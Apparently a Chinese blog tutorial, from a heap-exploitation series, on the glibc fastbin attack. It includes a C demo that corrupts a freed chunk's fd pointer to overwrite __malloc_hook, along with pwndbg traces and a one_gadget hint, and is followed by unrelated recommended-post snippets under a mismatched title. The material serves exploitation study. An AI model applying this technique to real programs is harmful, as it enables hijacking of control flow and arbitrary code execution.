判断unsigned long long乘法溢出_二进制安全之堆溢出(系列)—— fast bin attack

最新推荐文章于 2023-08-20 00:03:08 发布
最新推荐文章于 2023-08-20 00:03:08 发布
阅读量72 收藏
点赞数
文章标签: 判断unsigned long long乘法溢出

本文是二进制安全之堆溢出系列的第八章节,主要介绍fast bin attack。

原理

19f5dc3538d491b67c9a02bab2ebcad2.png
  • 从fastbin中分配堆块的检测机制
if (__builtin_expect (victim_idx != idx, 0)) //检查当前所属idx的size和target的size是否匹配 malloc_printerr ("malloc(): memory corruption (fast)"); do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s){INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);​if (!chunk_is_mmapped (p)) {   assert (av == arena_for_chunk (p));   if (chunk_main_arena (p))     assert (av == &main_arena);   else     assert (av != &main_arena); }do_check_inuse_chunk (av, p);do_check_inuse_chunk检查previnuse是否为1chunk_is_mmapped检查是否是mmap位是否为1,当mmap为1的时候可以跳过此检查

Demo

#include #include #include #include int main(){    int size = 0x60;    char *p = malloc(size);    long __malloc_hook_addr = 0x7ffff7dd1b10;    printf("%p",p);    sleep(0);    free(p);    sleep(0);    printf("%p",p);    *(long*)p =  __malloc_hook_addr - 0x23;    sleep(0);    char *q = malloc(size);    printf("%p",q);    sleep(0);    char* r = malloc(size);    printf("%p",r);    sleep(0);    strcpy(r,"aaajunkjunkjunkbbbbcccc"); ///cccc会替换__malloc_hook的内容    malloc(0);    sleep(0);    return 0;}

__malloc_hook_addr – 0×23的原因

pwndbg> x/20gz 0x7ffff7dd1b10-0x300x7ffff7dd1ae0 <_io_wide_data_0>:   0x0000000000000000  0x00000000000000000x7ffff7dd1af0 <_io_wide_data_0>:   0x00007ffff7dd0260  0x00000000000000000x7ffff7dd1b00 <__memalign_hook>:   0x00007ffff7a92e20  0x00007ffff7a92a000x7ffff7dd1b10 <__malloc_hook>: 0x0000000000000000  0x0000000000000000-----__malloc_hook_addr - 0x23刚好到0x0000**7f**fff7dd0260-----pwndbg> x/20gz 0x7ffff7dd1b10-0x230x7ffff7dd1aed <_io_wide_data_0>:   0xfff7dd0260000000  0x000000000000007f得到一个可以伪造size为0x7f的地址这时把`0x7ffff7dd1aed作为target_addr,可以绕过之前fastbin的第一项检测然后将这块地址分配出来,然后构造padding,覆盖__malloc_hook的内容

0x7f的原因

为了满足fastbin分配的第一项size的检查,一般选择的是6号索引,即malloc(0×60)由于chunk_is_mmapped检测的原因,不能用0×71。0x7f作为内存中地址的高位,而libc的地址就是0x7f开始的,这为fastbin attack提供了便利。unsorted bin attack可以在unlink的时候将main_arena的地址赋给bk,也可以方便的得到0x7f

调试

  • free p 之后的bins链和size位
0x70: 0x602000 ◂— 0x00x602000:0x00000000000000000x0000000000000071

写入target - 0x23的地址

0x602000:   0x0000000000000000  0x00000000000000710x602010:   0x00007ffff7dd1aed  0x0000000000000000​0x7ffff7dd1aed <_io_wide_data_0>:   0xfff7dd0260000000  0x000000000000007f此时的bins链0x70: 0x602000 —▸ 0x7ffff7dd1aed (_IO_wide_data_0+301) ◂— 0xfff7a92e20000000因为p已经被free,我们再修改它的fd,就会自动链接上target

malloc q 之后的bins链和heap

0x602000 FASTBIN {prev_size = 0, size = 113, fd = 0x7ffff7dd1aed <_io_wide_data_0>, bk = 0x0, fd_nextsize = 0x0, bk_nextsize = 0x0}0x70: 0x7ffff7dd1aed (_IO_wide_data_0+301) ◂— 0xfff7a92e20000000此时我们的目标chunk还在bins链中,需要再一次malloc出去。

malloc r之后的bins链和heap

0x602000 FASTBIN {prev_size = 0, size = 113, fd = 0x7ffff7dd1aed <_io_wide_data_0>, bk = 0x0, fd_nextsize = 0x0, bk_nextsize = 0x0}0x70: 0xfff7a92e20000000此时,0x7ffff7dd1aed这个堆块已经被malloc出去了,即作为r的堆块此时,__malloc_hook的内容pwndbg> x/20gz 0x00007ffff7dd1aed+0x230x7ffff7dd1b10 <__malloc_hook>: 0x0000000000000000  0x0000000000000000

strcpy r之后__malloc_hook被覆盖为”cccc”

pwndbg> x/20gz 0x00007ffff7dd1aed+0x23  //精准填充0x7ffff7dd1b10 <__malloc_hook>:0x00000000626262620x0000000000000000利用的时候将cccc,替换为onegadget的地址one_gadget /lib/x86_64-linux-gnu/libc-2.23.so
b7d97fc4b2579982a81b5515f07e9713.png
weixin_39768444
关注
unsigned long long 溢出 乘_二进制安全之堆溢出系列)—— unsorted bin attack
weixin_39611754的博客
11-30 115
本文是二进制安全之堆溢出系列的第十章节,主要介绍unsorted bin attack。原理实现效果只能在任意地址写入一个大数 通常在一个地址写入7f,然后配合fastbin attack使用,达到任意地址写的效果断链操作/* remove from unsorted list */ bck = victim->bk unsorted_chunks (av)->bk = bck; ...
unsigned long long 溢出 乘_二进制安全之堆溢出系列)—— off by null
weixin_39813009的博客
11-30 81
本文是二进制安全之堆溢出系列的第七章节,主要介绍off by null。原理思路通过修改chunk的prev_inuse位,达到一个堆块重叠的作用流程修改下一个堆块B的size的最后一字节为0,即prev_inuse置0,size随之减小,逻辑上分为0×100的B1+0×20的B2在B2伪造一个chunk,其prev_inuse改为1,用以防止B和A发生前向合并,并在后面malloc fire时越...
判断unsigned long long乘法溢出_记一次内存溢出的分析经历
weixin_39912163的博客
12-05 302
背景:有一个项目做一个系统,分客户端和服务端,客户端用c++写的,用来收集信息然后传给服务端(客户端的数量还是比较多的,正常的有几千个),服务端用Java写的(带管理页面),属于RPC模式,中间的通信框架使用的是thrift。thrift很多优点就不多说了,它是facebook的开源的rpc框架,主要是它能够跨语言,序列化速度快,但是他有个不讨喜的地方就是它必须用自己IDL来定义接口thrift版...
unsignedlonglong相乘溢出判断_ProxySQL 整数溢出
weixin_39616056的博客
12-05 217
最近学习了下 ProxySQL,在非生产环境大致体验了下,感觉不错,于是小流量上了生产环境,然而居然发现有个奇怪的现象,客户端大概率连不上 MySQL 服务器,报告如下错误:Max connect timeout reached while reaching hostgroup 3034 after 10000ms非常郁闷,网上搜索了下,跟我遇到的情况都不符合,我确认了 runtime_mysql...
判断unsigned long long乘法溢出_信息安全课程17:缓冲区溢出2
weixin_39603613的博客
12-04 287
在之前所讲述的内容中,都是我们在自己的程序中自行修改的;正常情况下,没有程序员会在自己的代码中这样写——那有没有办法攻击别人正常的程序呢?攻击者怎么样能够影响到不是自己的程序的返回地址呢?以及怎么样通过攻击别人的代码来获得shell呢?并且最好是root shell呢? 为了理解一下这个问题的难度,我们来归纳一下在之前获得shell的例子中,我们利用了哪些条件。首先,我们在程序中,写了一段调用生成...
java 操作二进制_Java 二进制文件操作大全
weixin_32380307的博客
02-12 1570
本文节选自《Netkiller Java 手札》Netkiller Java 手札Mr. Neo Chan, 陈景峯(BG7NYT)中国广东省深圳市望海路半岛城邦三期 518067 +86 13113668890 $Id: book.xml 606 2013-05-29 09:52:58Z netkiller $版权 © 2015-2018 Neo Chan版权声明转载请与作者联系,转载时请务必标...
8位二进制转bcd算法 c语言,二进制转BCD码快速算法 bin to bcd fast code.
weixin_39798943的博客
05-23 1627
24位BIN转BCD码://--------------start of file---------------- --extern void bin2bcd(unsigned char *output, unsigned long input); --void bin2bcd(unsigned char *output, unsigned long input) -{ -*output = 0;...
C语言-(*(volatile_unsigned_long*))理解
让你爱上电路设计
05-10 2467
本文详细解析了C语言中`*(volatile_unsigned_long*)`的含义,包括`(unsigned long *)`指针类型、volatile关键字的作用以及如何在内存中存储数值。通过实例代码展示了如何读取内存中的小数,并探讨了浮点数在内存中的存储结构。
python二进制数连接_python二进制处理详述(转)
weixin_42122838的博客
01-29 2047
python没有二进制类型,但可以存储二进制类型的数据,就是用string字符串类型来存储二进制数据,这也没关系,因为string是以1个字节为单位的。1 importstruct23 a=12.3445 #将a变为二进制67 bytes=struct.pack('i',a)此时bytes就是一个string字符串,字符串按字节同a的二进制存储内容相同。再进行反操作现有二进制数据bytes(其实就...
pythonnumpy生成二进制流_Python 读写二进制文件 以及Numpy读写二进制文件
weixin_35440082的博客
12-23 3138
1. 什么是.bin文件扩展名为.bin的文件就是一个二进制文件(binary)。不同于文本文件,二进制文件用记事本、Notepad++等打开都是乱码。像是这样:但是.bin文件可以用WINHEX等软件打开。二进制文件里面存储的都是数据,只有按照某个预先设定的规则读出,才能明白这些数字的具体含义。WINHEX将二进制文件内容转为十六进制的形式展现出来:二进制文件相比于文本文件的优点:节约存储空间、...
【堆知识总结 | bins结构】fastbins attack:babyheap_0ctf_2017
最新发布
ethan18的博客
08-20 234
在堆漏洞这里面已经研究了差不多半个月了,虽然都还是很基础的知识,但是也差不多改收尾去看看别的部分的知识了,遇到不会的堆的题目(大概率会有)再来写堆题目的wp吧想要或多或少总结一下堆chunk里面的一些漏洞,但我做的题也不多,所以能够写的也只有我理解的小小的一部分,并且有点想一出是一出。如果有看我博客的师傅的话请原谅一下哈哈哈。
判断unsigned long long乘法溢出_什么是缓冲区溢出攻击?
weixin_39826809的博客
12-03 354
黑客笔记 本期live互动、答疑相关问题归档:Buffer Overflow Vulnerability Lab实验目的:掌握缓冲区溢出漏洞原理。缓冲区溢出定义:程序企图在预分配的缓冲区之外写数据。漏洞危害:用于更改程序执行流,控制函数返回值,执行任意代码。漏洞产生原因:不可避免,由于程序存储数据(buffer)和程序(return address)都在栈上,当存储数据覆盖了控制数据,就会发生缓冲...
[pwn]堆:fastbin attack详解
热门推荐
Breeze的博客
12-31 1万+
[pwn]fastbin attack 文章目录[pwn]fastbin attackfastbin attack原理double freeuse after freechunk extend需要注意的点:0ctf:babyheap fastbin attack原理 fastbin attack是利用fastbin分配原理的漏洞,利用要求是我们能够修改“已释放”堆块。通常情况下与double fr...
怎么判断unsigned+long+long相乘是否溢出_技巧篇:“白洋淀”怎么翻译?山河湖海的翻译方法 | CATTI和MTI...
weixin_39596739的博客
11-09 122
技巧篇:“白洋淀”怎么翻译?山河湖海的翻译方法 | CATTI和MTI今天今天高斋翻译学堂雒老师Joy和小伙伴给大家总结了英语中常见的山河湖海名称的翻译方法,CATTI和MTI考试必备。1. 名称是由单字+通名构成的,一般翻译为双字+通名。例如,“华山”翻译为Huashan Mountain或者 Mount Hua;泰山Taishan Mountain或者Mount Tai;秦岭 Qinling ...
如何判断超出unsigned long long_如何增强代码的可读性?嵌入式代码之编写规范
weixin_39805409的博客
11-30 258
嵌入式代码编码规范,用于规范自己的代码,增强可读性,非标准规范。最好能强制自己形成良好的编码风格,有利于开发大规模程序而不显得杂乱。参考STM32固件库编码风格和FreeRTOS编码风格。一、工程文件组织结构 新建工程文件应包含以下全部或部分文件夹:usrSrc:用户源文件,用来存放.c文件和其他的源文件。main.c应放在这里。usrInc:用户头文件,用来存放.h文件。usrD...
字符串哈希总结
mumei的博客
08-13 1297
昨天做了学长拉的字符串哈希的专题,今天便来做个总结吧。 哈希是数据结构里面的内容,其实就是把字符串编个号,用数字来表示,这样查询和判断相同时就方便了许多。 但是编的这个号也是有很关键,我们需要尽可能的保证不同字符串的编号不会相等,即冲突概率为0. 一个关键的定理:哈希值相等的字符串不一定相等,字符串相等的哈希值一定相等。因此我们需要尽可能减少第一种情况。 在处理子串问题时,我们一般采用前缀...
pycharm调试pycaffe,出现Process finished with exit code 139 (interrupted by signal 11: SIGSEGV)
leogo17的博客
07-05 1万+
最近,在pycharm中调试pycaffe时,本来运行正常的程序突然无法正常训练。数据准备阶段没有问题,一旦开始进入训练,就出现:Process finished with exit code 139 (interrupted by signal 11: SIGSEGV),训练直接终止。尝试许久,找到了原因,是我将pycaffe重新编译了,而Pycharm运行时所使用的python package...
java中Long类型溢出引发的思考
qq_21006731的博客
09-12 8815
long var = 数字常量(数字常量大于等于2^31),实际上,此时的var 的值为溢出后的值; 溢出之后会变为负值和预期作不符。 并且编译器不报错,但是结果和预期不符。 在检查bug过程中 要注意所赋值不能超过该变量自身的最大值,其他类型也是如此。 byte的取值范围为-128~127,占用1个字节(-2的7次方到2的7次方-1) short的取值范围为-32768~3276
unsigned long二进制
06-07
unsigned long 类型的数先转换为十进制字符串,再将十进制字符串转换为二进制字符串即可。以下是一个 C++ 示例代码: ```c++ #include #include int main() { unsigned long num = 123456789UL; // 待转换的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值